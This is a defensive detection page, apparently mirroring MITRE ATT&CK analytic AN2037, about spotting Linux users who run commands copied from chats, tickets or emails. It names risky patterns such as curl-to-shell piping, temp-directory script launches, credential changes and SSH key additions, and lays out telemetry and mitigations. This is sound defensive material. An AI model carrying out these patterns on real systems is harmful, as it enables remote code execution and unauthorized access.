AN2037: Analytic 2037
Detects users executing commands copied from chats, tickets, or emails, including curl|bash patterns, shell script launches from temp directories, credential changes, or SSH key additions shortly after communication events.
Analyst context for executives and security teams
This analytic is about a common operational weak point: Linux users running commands that came from chats, tickets, or emails. The business risk is not the communication tool itself, but the moment unverified instructions become shell activity, such as curl-to-shell patterns, scripts launched from temporary directories, credential changes, or SSH key additions shortly after a message event.
Executive priority
Prioritize this as a control-validation and incident-readiness question: can the organization correlate user communications with risky Linux command execution quickly enough to distinguish normal support activity from potentially unsafe instruction-following? This matters for SOC triage quality, insider-risk review, help desk governance, identity hygiene, and audit evidence around privileged access changes.
Technical view
For Linux environments, validate whether endpoint and identity telemetry can show command execution, script location, credential-related changes, SSH key modifications, user context, timing, and nearby communication events. Because no ATT&CK tactic or formal detection logic is supplied, teams should treat AN2037 as a detection concept rather than a complete rule. The useful validation is whether risky shell activity occurring shortly after chats, tickets, or emails can be correlated without excessive noise from legitimate administration.
Likely telemetry
- Linux process execution and command-line telemetry
- Shell history or terminal session records where available and appropriate
- File creation and execution events in temporary directories
- Account, credential, and password change logs
- SSH authorized_keys or equivalent key modification events
Detection direction
- Validate correlation between communication events and subsequent Linux command execution by the same user or on the relevant host.
- Pay special attention to curl-to-shell style command patterns, shell scripts launched from temporary directories, credential changes, and SSH key additions shortly after communication events, as described by the analytic.
- Tune for known administrative workflows, support runbooks, deployment tooling, and approved automation to reduce false positives.
- Confirm whether communication metadata is available to the SOC; without it, the analytic may degrade into generic Linux command monitoring.
- Use this as a hunting and triage enrichment pattern unless local testing proves reliable alerting thresholds.
Mitigation priorities
- Define approved procedures for commands shared through chats, tickets, or emails, especially for privileged Linux administration.
- Require review or safer execution paths for scripts and commands that modify credentials or SSH access.
- Harden monitoring around temporary-directory script execution and sensitive identity changes on Linux systems.
- Maintain audit-ready records linking administrative requests, approvals, and resulting system changes.
- Train support and operations teams to verify command provenance before execution.
Analyst notes and limits
AN2037 is a detection analytic object for enterprise ATT&CK, external ID AN2037, platform Linux. The official description provides the behavioral focus, but no official detection logic, tactic, relationships, aliases, or labels are supplied. The strongest use is as a coverage assessment prompt for SOC, IR, identity, and Linux administration processes.
This take is limited to the supplied ATT&CK fields. It does not assert active exploitation, adversary attribution, coverage effectiveness, or applicability beyond Linux. Local telemetry availability, communication-platform access, privacy constraints, and administrative workflow context are required before operationalizing this analytic.
Analytic 2037
Detects users executing commands copied from chats, tickets, or emails, including curl|bash patterns, shell script launches from temp directories, credential changes, or SSH key additions shortly after communication events.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | 84e9edc90918… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
mitre-attack AN2037Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.